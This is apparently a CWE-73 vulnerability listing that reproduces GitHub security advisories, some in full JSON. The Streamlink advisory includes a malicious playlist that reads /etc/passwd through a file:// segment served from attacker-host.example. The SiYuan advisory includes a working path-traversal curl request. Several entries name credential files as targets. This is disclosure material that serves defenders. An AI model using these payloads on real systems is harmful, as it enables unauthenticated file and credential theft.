CWE-73
AllowedExternal Control of File Name or Path
Abstraction: Base · Status: Draft
The product allows user input to control or influence paths or file names that are used in filesystem operations.
911 vulnerabilities reference this CWE, most recent first.
GHSA-HFPP-2Q66-88FJ
Vulnerability from github – Published: 2025-11-09 00:30 – Updated: 2025-11-09 00:30A vulnerability was found in 70mai X200 up to 20251019. This issue affects some unknown processing of the component Init Script Handler. The manipulation results in file inclusion. The attack requires a local approach. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2025-12915"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-08T23:15:48Z",
"severity": "HIGH"
},
"details": "A vulnerability was found in 70mai X200 up to 20251019. This issue affects some unknown processing of the component Init Script Handler. The manipulation results in file inclusion. The attack requires a local approach. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-hfpp-2q66-88fj",
"modified": "2025-11-09T00:30:26Z",
"published": "2025-11-09T00:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12915"
},
{
"type": "WEB",
"url": "https://github.com/geo-chen/70mai/blob/main/README.md#finding-11-init-script-binary-hijack-persistence-vulnerability-in-70mai-x200-omni-dashcam"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.331633"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.331633"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.678285"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-HGGF-8H2Q-J24H
Vulnerability from github – Published: 2026-07-14 18:32 – Updated: 2026-07-14 18:32External control of file name or path in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.
{
"affected": [],
"aliases": [
"CVE-2026-54108"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-14T17:17:03Z",
"severity": "MODERATE"
},
"details": "External control of file name or path in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.",
"id": "GHSA-hggf-8h2q-j24h",
"modified": "2026-07-14T18:32:06Z",
"published": "2026-07-14T18:32:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54108"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54108"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-HGQW-6M45-HW5F
Vulnerability from github – Published: 2026-05-11 14:28 – Updated: 2026-06-08 23:49Summary
Streamlink's HLS and DASH parsers do not validate the URI scheme of segment entries and other resources. A remote .m3u8 HLS playlist or .mpd DASH manifest can list file:///path/to/file as a segment, and streamlink will read that local file and write its contents to the output stream.
Confirmed on streamlink 8.3.0 (latest release at time of report).
Description
Segment URIs from an HLS playlist or DASH manifest are passed to the worker without any scheme check. The underlying HTTP session accepts file:// URIs, which resolve against the local filesystem. There is no scheme allowlist at the parser level, so any path readable by the streamlink process is treated as a valid segment.
The attacker does not need local access to the victim. A playlist/manifest hosted on an attacker-controlled server, fetched by streamlink on the victim's machine, is enough to trigger the read.
Impact
A remote attacker hosting a malicious playlist/manifest can make any client running streamlink against that URL read arbitrary local files within the streamlink process's read scope and write them into the output file.
Reachable files depend on the user running streamlink. Typical targets: ~/.ssh/id_* private keys, ~/.aws/credentials, shell history, application config files holding API tokens, and world-readable system files like /etc/passwd.
Affected scenarios
- Server-side or automated deployments (recording bots, media pipelines, CI jobs processing playlists). The output file is often uploaded, logged, or otherwise exposed, which gives direct disclosure to attacker-reachable locations.
- Interactive desktop use. File contents land on the victim's disk and can leak through secondary channels: the user sharing the recording, cloud sync, backup, etc.
This bug does not on its own send file contents back to the attacker. The disclosure goes to the output sink. Full exfiltration depends on what happens to that file afterward.
Steps to reproduce
Tested on streamlink 8.3.0, Linux (Kali).
-
Save as
playlist.m3u8:```m3u
EXTM3U
EXT-X-VERSION:3
EXT-X-TARGETDURATION:5
EXT-X-PLAYLIST-TYPE:VOD
EXTINF:5.0,
file:///etc/passwd
EXT-X-ENDLIST
```
-
Host the playlist on a remote server reachable by the victim. For testing, a VPS, a tunnel (cloudflared, ngrok), or a static host like GitHub Pages all work.
-
On the victim machine:
sh streamlink "hls://https://attacker-host.example/playlist.m3u8" best -o /tmp/proof.ts -
Inspect the output:
sh cat /tmp/proof.ts -
The output contains the contents of
/etc/passwdfrom the machine running streamlink.
Local reproduction (equivalent, simpler to set up):
python3 -m http.server 8080 # in directory containing playlist.m3u8
streamlink "hls://http://127.0.0.1:8080/playlist.m3u8" best -o /tmp/proof.ts
cat /tmp/proof.ts
The remote case was confirmed independently using a tunnel.
Proposed remediation
Allowlist http and https for segment URIs in the HLS parser. Reject any other scheme (file, ftp, data, etc.) at parse time, before the URI reaches the fetcher.
The check needs to cover:
- Segment URIs in the top-level manifest.
- Segment URIs in nested manifests pulled during playback (variant playlists referenced from a master playlist).
- Other URI fields the fetcher consumes —
#EXT-X-KEYand#EXT-X-MAPURIs at minimum. Worth auditing the rest for the same issue.
The check belongs in the parser, not the fetcher. Putting it next to the untrusted input means downstream callers don't each need to re-implement it, and any future fetcher path inherits the protection by default.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.3.0"
},
"package": {
"ecosystem": "PyPI",
"name": "streamlink"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44353"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-11T14:28:30Z",
"nvd_published_at": "2026-05-27T17:16:38Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nStreamlink\u0027s HLS and DASH parsers do not validate the URI scheme of segment entries and other resources. A remote `.m3u8` HLS playlist or `.mpd` DASH manifest can list `file:///path/to/file` as a segment, and streamlink will read that local file and write its contents to the output stream.\n\nConfirmed on streamlink 8.3.0 (latest release at time of report).\n\n## Description\n\nSegment URIs from an HLS playlist or DASH manifest are passed to the worker without any scheme check. The underlying HTTP session accepts `file://` URIs, which resolve against the local filesystem. There is no scheme allowlist at the parser level, so any path readable by the streamlink process is treated as a valid segment.\n\nThe attacker does not need local access to the victim. A playlist/manifest hosted on an attacker-controlled server, fetched by streamlink on the victim\u0027s machine, is enough to trigger the read.\n\n## Impact\n\nA remote attacker hosting a malicious playlist/manifest can make any client running streamlink against that URL read arbitrary local files within the streamlink process\u0027s read scope and write them into the output file.\n\nReachable files depend on the user running streamlink. Typical targets: `~/.ssh/id_*` private keys, `~/.aws/credentials`, shell history, application config files holding API tokens, and world-readable system files like `/etc/passwd`.\n\n### Affected scenarios\n\n- Server-side or automated deployments (recording bots, media pipelines, CI jobs processing playlists). The output file is often uploaded, logged, or otherwise exposed, which gives direct disclosure to attacker-reachable locations.\n- Interactive desktop use. File contents land on the victim\u0027s disk and can leak through secondary channels: the user sharing the recording, cloud sync, backup, etc.\n\nThis bug does not on its own send file contents back to the attacker. The disclosure goes to the output sink. Full exfiltration depends on what happens to that file afterward.\n\n## Steps to reproduce\n\nTested on streamlink 8.3.0, Linux (Kali).\n\n1. Save as `playlist.m3u8`:\n\n ```m3u\n #EXTM3U\n #EXT-X-VERSION:3\n #EXT-X-TARGETDURATION:5\n #EXT-X-PLAYLIST-TYPE:VOD\n #EXTINF:5.0,\n file:///etc/passwd\n #EXT-X-ENDLIST\n ```\n\n2. Host the playlist on a remote server reachable by the victim. For testing, a VPS, a tunnel (cloudflared, ngrok), or a static host like GitHub Pages all work.\n\n3. On the victim machine:\n\n ```sh\n streamlink \"hls://https://attacker-host.example/playlist.m3u8\" best -o /tmp/proof.ts\n ```\n\n3. Inspect the output:\n\n ```sh\n cat /tmp/proof.ts\n ```\n\n4. The output contains the contents of `/etc/passwd` from the machine running streamlink.\n\n### Local reproduction (equivalent, simpler to set up):\n\n```sh\npython3 -m http.server 8080 # in directory containing playlist.m3u8\nstreamlink \"hls://http://127.0.0.1:8080/playlist.m3u8\" best -o /tmp/proof.ts\ncat /tmp/proof.ts\n```\n\nThe remote case was confirmed independently using a tunnel.\n\n## Proposed remediation\n\nAllowlist http and https for segment URIs in the HLS parser. Reject any other scheme (file, ftp, data, etc.) at parse time, before the URI reaches the fetcher.\n\nThe check needs to cover:\n\n- Segment URIs in the top-level manifest.\n- Segment URIs in nested manifests pulled during playback (variant playlists referenced from a master playlist).\n- Other URI fields the fetcher consumes \u2014 `#EXT-X-KEY` and `#EXT-X-MAP` URIs at minimum. Worth auditing the rest for the same issue.\n\nThe check belongs in the parser, not the fetcher. Putting it next to the untrusted input means downstream callers don\u0027t each need to re-implement it, and any future fetcher path inherits the protection by default.",
"id": "GHSA-hgqw-6m45-hw5f",
"modified": "2026-06-08T23:49:42Z",
"published": "2026-05-11T14:28:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/streamlink/streamlink/security/advisories/GHSA-hgqw-6m45-hw5f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44353"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/streamlink/PYSEC-2026-180.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/streamlink/streamlink"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Streamlink has an arbitrary local file read via file:// URI in HLS and DASH"
}
GHSA-HGW6-8C77-V4GQ
Vulnerability from github – Published: 2026-06-18 17:22 – Updated: 2026-07-15 21:51External Control of File Name or Path in xDS SDS DataSource
Summary
DataSourceStream in the :xds module resolves control-plane-supplied filename and environment_variable fields from SDS Secret resources without any allow-list or base-directory confinement. A semi-trusted or compromised xDS control plane (or an attacker who can MITM SDS responses) can read arbitrary local files and environment variables on the xDS client host.
Affected component: xds/src/main/java/com/linecorp/armeria/xds/DataSourceStream.java
Introduced in: Armeria 1.38.0 (commit b199560b10, "Add support for SDS", #6597)
Affected versions: 1.38.0, 1.39.0
Impact
A semi-trusted or compromised xDS control plane (or an attacker who can inject/MITM SDS responses) can:
- Read arbitrary files on the xDS client host — TLS private keys,
/etc/passwd, mounted Kubernetes service-account tokens, cloud credential files, etc. - Read arbitrary environment variables —
AWS_SECRET_ACCESS_KEY, CI tokens, database credentials, etc.
The read bytes are consumed as TLS key/cert/CA material. Combined with CWE-295 (silent disabling of upstream TLS peer verification), the exfiltrated secret can be presented to an attacker-chosen upstream, enabling data exfiltration. This is a confused-deputy / information-disclosure primitive driven entirely by control-plane-supplied configuration.
Severity: High — arbitrary host-level file and environment variable read via control-plane-pushed configuration.
Patches
1.40.0
The fix should:
- Confine
filenameresolution to an operator-configured allow-list of base directories. After normalization, reject any path that escapes the allow-listed root. - Gate
environment_variablebehind an explicit operator allow-list of permitted variable names. - Default to denying both
filenameandenvironment_variableDataSources for control-plane-delivered (SDS) secrets unless explicitly enabled by the operator. This is stricter than upstream Envoy but appropriate when the control plane is not fully trusted. - Document the trust model clearly so operators understand that enabling file/env DataSources grants the control plane host-level read capability.
Workarounds
- Ensure the xDS control plane channel is authenticated and encrypted (mTLS) to prevent MITM injection of malicious SDS responses.
- Run the xDS client with minimal filesystem permissions and a restricted environment to limit the blast radius of arbitrary reads.
- If SDS file-based secrets are not needed, consider using inline
DataSourcebytes only (delivered over the SDS stream itself) and auditing control-plane configurations to ensure nofilenameorenvironment_variableDataSources are present.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.linecorp.armeria:armeria-xds"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.40.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-11752"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T17:22:17Z",
"nvd_published_at": "2026-06-19T06:17:01Z",
"severity": "MODERATE"
},
"details": "## External Control of File Name or Path in xDS SDS DataSource\n\n### Summary\n\n`DataSourceStream` in the `:xds` module resolves control-plane-supplied `filename` and `environment_variable` fields from SDS Secret resources without any allow-list or base-directory confinement. A semi-trusted or compromised xDS control plane (or an attacker who can MITM SDS responses) can read arbitrary local files and environment variables on the xDS client host.\n\n**Affected component:** `xds/src/main/java/com/linecorp/armeria/xds/DataSourceStream.java`\n**Introduced in:** Armeria 1.38.0 (commit `b199560b10`, \"Add support for SDS\", #6597)\n**Affected versions:** 1.38.0, 1.39.0\n\n### Impact\n\nA semi-trusted or compromised xDS control plane (or an attacker who can inject/MITM SDS responses) can:\n\n- **Read arbitrary files** on the xDS client host \u2014 TLS private keys, `/etc/passwd`, mounted Kubernetes service-account tokens, cloud credential files, etc.\n- **Read arbitrary environment variables** \u2014 `AWS_SECRET_ACCESS_KEY`, CI tokens, database credentials, etc.\n\nThe read bytes are consumed as TLS key/cert/CA material. Combined with CWE-295 (silent disabling of upstream TLS peer verification), the exfiltrated secret can be presented to an attacker-chosen upstream, enabling data exfiltration. This is a confused-deputy / information-disclosure primitive driven entirely by control-plane-supplied configuration.\n\n**Severity:** High \u2014 arbitrary host-level file and environment variable read via control-plane-pushed configuration.\n\n### Patches\n\n1.40.0\n\nThe fix should:\n\n1. **Confine `filename` resolution** to an operator-configured allow-list of base directories. After normalization, reject any path that escapes the allow-listed root.\n2. **Gate `environment_variable`** behind an explicit operator allow-list of permitted variable names.\n3. **Default to denying** both `filename` and `environment_variable` DataSources for control-plane-delivered (SDS) secrets unless explicitly enabled by the operator. This is stricter than upstream Envoy but appropriate when the control plane is not fully trusted.\n4. **Document the trust model** clearly so operators understand that enabling file/env DataSources grants the control plane host-level read capability.\n\n### Workarounds\n\n- Ensure the xDS control plane channel is authenticated and encrypted (mTLS) to prevent MITM injection of malicious SDS responses.\n- Run the xDS client with minimal filesystem permissions and a restricted environment to limit the blast radius of arbitrary reads.\n- If SDS file-based secrets are not needed, consider using inline `DataSource` bytes only (delivered over the SDS stream itself) and auditing control-plane configurations to ensure no `filename` or `environment_variable` DataSources are present.",
"id": "GHSA-hgw6-8c77-v4gq",
"modified": "2026-07-15T21:51:39Z",
"published": "2026-06-18T17:22:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/line/armeria/security/advisories/GHSA-hgw6-8c77-v4gq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11752"
},
{
"type": "PACKAGE",
"url": "https://github.com/line/armeria"
},
{
"type": "WEB",
"url": "https://github.com/line/armeria/security/advisories/xds/src/main/java/com/linecorp/armeria/xds/DataSourceStream.java"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Armeria: External Control of File Name or Path in xDS SDS DataSource"
}
GHSA-HH82-JV5X-68C7
Vulnerability from github – Published: 2025-03-14 18:30 – Updated: 2025-03-14 18:30An external control of file name or path vulnerability [CWE-73] in FortiClientMac version 7.2.3 and below, version 7.0.10 and below installer may allow a local attacker to execute arbitrary code or commands via writing a malicious configuration file in /tmp before starting the installation process.
{
"affected": [],
"aliases": [
"CVE-2023-45588"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-14T16:15:27Z",
"severity": "HIGH"
},
"details": "An external control of file name or path vulnerability [CWE-73] in FortiClientMac version 7.2.3 and below, version 7.0.10 and below installer may allow a local attacker to execute arbitrary code or commands via writing a malicious configuration file in /tmp before starting the installation process.",
"id": "GHSA-hh82-jv5x-68c7",
"modified": "2025-03-14T18:30:50Z",
"published": "2025-03-14T18:30:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45588"
},
{
"type": "WEB",
"url": "https://fortiguard.com/psirt/FG-IR-23-345"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HHGJ-GG9H-RJP7
Vulnerability from github – Published: 2026-03-20 20:43 – Updated: 2026-03-25 18:22Summary
The Siyuan kernel exposes an unauthenticated file-serving endpoint under /appearance/*filepath. Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process.
Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials.
Details
Vulnerable Code Location
File: kernel/server/serve.go
siyuan.GET("/appearance/*filepath", func(c *gin.Context) {
filePath := filepath.Join(
appearancePath,
strings.TrimPrefix(c.Request.URL.Path, "/appearance/")
)
...
c.File(filePath)
})
Technical Root Cause
The handler constructs a filesystem path by joining a base directory (appearancePath) with user-controlled URL segments.
Key issues:
1. Unsanitized User Input
The path component extracted from the request is not validated or normalized to prevent traversal.
strings.TrimPrefix(c.Request.URL.Path, "/appearance/")
This preserves sequences such as:
../
..\ (Windows)
2. Unsafe Path Joining
filepath.Join() does not enforce directory confinement.
This escapes the intended directory.
3. Direct File Serving
The resolved path is served without verification:
c.File(filePath)
Authentication Bypass (Unauthenticated Access)
Authentication middleware explicitly skips /appearance/ requests.
File: session.go
if strings.HasPrefix(c.Request.RequestURI, "/appearance/") ||
strings.HasPrefix(c.Request.RequestURI, "/stage/build/export/") ||
strings.HasPrefix(c.Request.RequestURI, "/stage/protyle/") {
c.Next()
return
}
This allows attackers to access the vulnerable endpoint without a session or token.
Exploitation Scenario
A remote attacker can craft a URL containing directory traversal sequences to read files accessible to the Siyuan process.
Example request:
GET /appearance/../../data/conf.json HTTP/1.1
Host: target
Because authentication is bypassed, the attack requires no credentials.
PoC
Step 1 — Create marker file
mkdir -p ./workspace/data
echo POC_EXPLOITED > ./workspace/data/poc_exploit.txt
Step 2 — Run SiYuan container
docker run -d \
-p 6806:6806 \
-e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan \
--workspace=/siyuan/workspace
Step 3 — Confirm service works
Open in browser:
http://127.0.0.1:6806
Exploit PoC
Method A — using CURL command
Use --path-as-is so curl does NOT normalize ../.
curl -v --path-as-is \
"http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt"
Output
HTTP/1.1 200 OK
POC_EXPLOITED
Method B — Using Browser
http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt
If method B is not working, use method A, which is CURL command to do the exploit
Impact
An unauthenticated attacker can read arbitrary files accessible to the server process, including:
- Workspace configuration files
- User notes and stored data
- API tokens and secrets
- Local system files (depending on permissions)
This may lead to:
- Sensitive information disclosure
- Credential leakage
- Further compromise through exposed secrets
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.0-20260317012524-fe4523fff2c8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33476"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T20:43:20Z",
"nvd_published_at": "2026-03-20T23:16:48Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe Siyuan kernel exposes an unauthenticated file-serving endpoint under **/appearance/*filepath.**\nDue to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process.\n\nAuthentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials.\n\n## Details\n\nVulnerable Code Location\n\n**File: kernel/server/serve.go**\n\n``` sh\nsiyuan.GET(\"/appearance/*filepath\", func(c *gin.Context) {\n filePath := filepath.Join(\n appearancePath,\n strings.TrimPrefix(c.Request.URL.Path, \"/appearance/\")\n )\n ...\n c.File(filePath)\n})\n```\n\n\n**Technical Root Cause**\n\nThe handler constructs a filesystem path by joining a base directory (appearancePath) with user-controlled URL segments.\n\n**Key issues:**\n\n**1. Unsanitized User Input**\n\nThe path component extracted from the request is not validated or normalized to prevent traversal.\n\n``` sh\nstrings.TrimPrefix(c.Request.URL.Path, \"/appearance/\")\n``` \n\nThis preserves sequences such as:\n\n``` sh\n../\n..\\ (Windows)\n```\n\n**2. Unsafe Path Joining**\n\n**_filepath.Join()_** does not enforce directory confinement.\n\nThis escapes the intended directory.\n\n**3. Direct File Serving**\n\nThe resolved path is served without verification:\n\n``` sh\nc.File(filePath)\n``` \n\n### Authentication Bypass (Unauthenticated Access)\n\nAuthentication middleware explicitly skips /appearance/ requests.\n\n**File: session.go**\n``` sh\nif strings.HasPrefix(c.Request.RequestURI, \"/appearance/\") ||\n strings.HasPrefix(c.Request.RequestURI, \"/stage/build/export/\") ||\n strings.HasPrefix(c.Request.RequestURI, \"/stage/protyle/\") {\n c.Next()\n return\n}\n```\nThis allows attackers to access the vulnerable endpoint without a session or token.\n\n### Exploitation Scenario\n\nA remote attacker can craft a URL containing directory traversal sequences to read files accessible to the Siyuan process.\n\nExample request:\n\n```\nGET /appearance/../../data/conf.json HTTP/1.1\nHost: target\n\n```\nBecause authentication is bypassed, the attack requires no credentials.\n\n\n\n\n## PoC\n\n**Step 1 \u2014 Create marker file**\n\n```\nmkdir -p ./workspace/data\necho POC_EXPLOITED \u003e ./workspace/data/poc_exploit.txt\n```\n\n**Step 2 \u2014 Run SiYuan container**\n\n```\ndocker run -d \\\n -p 6806:6806 \\\n -e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \\\n -v $(pwd)/workspace:/siyuan/workspace \\\n b3log/siyuan \\\n --workspace=/siyuan/workspace\n\n```\n\n**Step 3 \u2014 Confirm service works**\n\nOpen in browser:\n\n``` sh\nhttp://127.0.0.1:6806\n```\n\n### Exploit PoC\n**Method A \u2014 using CURL command**\n\nUse --path-as-is so curl does NOT normalize ../.\n\n``` sh\ncurl -v --path-as-is \\\n \"http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt\"\n```\n\n**Output** \n\n``` sh\nHTTP/1.1 200 OK\nPOC_EXPLOITED\n```\n\n**Method B \u2014 Using Browser**\n\n``` sh\nhttp://127.0.0.1:6806/appearance/../../data/poc_exploit.txt\n```\n\nIf **method B** is not working, use **method A**, which is CURL command to do the exploit\n\n\n### Impact\n\nAn unauthenticated attacker can read arbitrary files accessible to the server process, including:\n\n- Workspace configuration files\n- User notes and stored data\n- API tokens and secrets\n- Local system files (depending on permissions)\n\nThis may lead to:\n\n- Sensitive information disclosure\n- Credential leakage\n- Further compromise through exposed secrets",
"id": "GHSA-hhgj-gg9h-rjp7",
"modified": "2026-03-25T18:22:10Z",
"published": "2026-03-20T20:43:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33476"
},
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Siyuan has an Unauthenticated Arbitrary File Read via Path Traversal"
}
GHSA-HHPM-74PM-HF35
Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2023-08-22 14:35The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/ingress-nginx"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.28.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-8553"
],
"database_specific": {
"cwe_ids": [
"CWE-610",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-13T21:00:22Z",
"nvd_published_at": "2020-07-29T15:15:00Z",
"severity": "MODERATE"
},
"details": "The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name.",
"id": "GHSA-hhpm-74pm-hf35",
"modified": "2023-08-22T14:35:45Z",
"published": "2022-05-24T17:24:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8553"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/ingress-nginx/issues/5126"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubernetes/ingress-nginx"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "ingress-nginx component for Kubernetes allows file overwrite"
}
GHSA-HHRC-VF2P-X5H3
Vulnerability from github – Published: 2026-06-28 00:30 – Updated: 2026-06-28 00:30The Frontend File Manager Plugin plugin for WordPress is vulnerable to Authenticated Arbitrary File Deletion in versions up to and including 23.6. This is due to a case-sensitive bypass of the wpfm_dir_path parameter sanitization in the wpfm_file_meta_update AJAX handler, where supplying WPFM_DIR_PATH in uppercase evades the unset check and is normalized to wpfm_dir_path by sanitize_key() during update_post_meta(), allowing an attacker to overwrite the stored file path with an arbitrary filesystem path that is then passed directly to unlink() in delete_file_locally() without any directory containment validation. This makes it possible for authenticated attackers with Subscriber-level access to delete arbitrary files on the server, including sensitive files such as wp-config.php, potentially leading to full site takeover.
{
"affected": [],
"aliases": [
"CVE-2026-8095"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-28T00:16:25Z",
"severity": "HIGH"
},
"details": "The Frontend File Manager Plugin plugin for WordPress is vulnerable to Authenticated Arbitrary File Deletion in versions up to and including 23.6. This is due to a case-sensitive bypass of the wpfm_dir_path parameter sanitization in the wpfm_file_meta_update AJAX handler, where supplying WPFM_DIR_PATH in uppercase evades the unset check and is normalized to wpfm_dir_path by sanitize_key() during update_post_meta(), allowing an attacker to overwrite the stored file path with an arbitrary filesystem path that is then passed directly to unlink() in delete_file_locally() without any directory containment validation. This makes it possible for authenticated attackers with Subscriber-level access to delete arbitrary files on the server, including sensitive files such as wp-config.php, potentially leading to full site takeover.",
"id": "GHSA-hhrc-vf2p-x5h3",
"modified": "2026-06-28T00:30:56Z",
"published": "2026-06-28T00:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8095"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.6/inc/file.class.php#L729"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.6/inc/files.php#L767"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/506006ce-7b1c-4f9d-93f3-abc87abea2bb?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HJC2-9QW7-V75F
Vulnerability from github – Published: 2025-05-17 06:30 – Updated: 2025-05-17 06:30The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the qcld_openai_delete_training_file() function in all versions up to, and including, 13.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
{
"affected": [],
"aliases": [
"CVE-2025-3812"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-17T06:15:18Z",
"severity": "HIGH"
},
"details": "The WPBot Pro Wordpress Chatbot plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the qcld_openai_delete_training_file() function in all versions up to, and including, 13.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).",
"id": "GHSA-hjc2-9qw7-v75f",
"modified": "2025-05-17T06:30:28Z",
"published": "2025-05-17T06:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3812"
},
{
"type": "WEB",
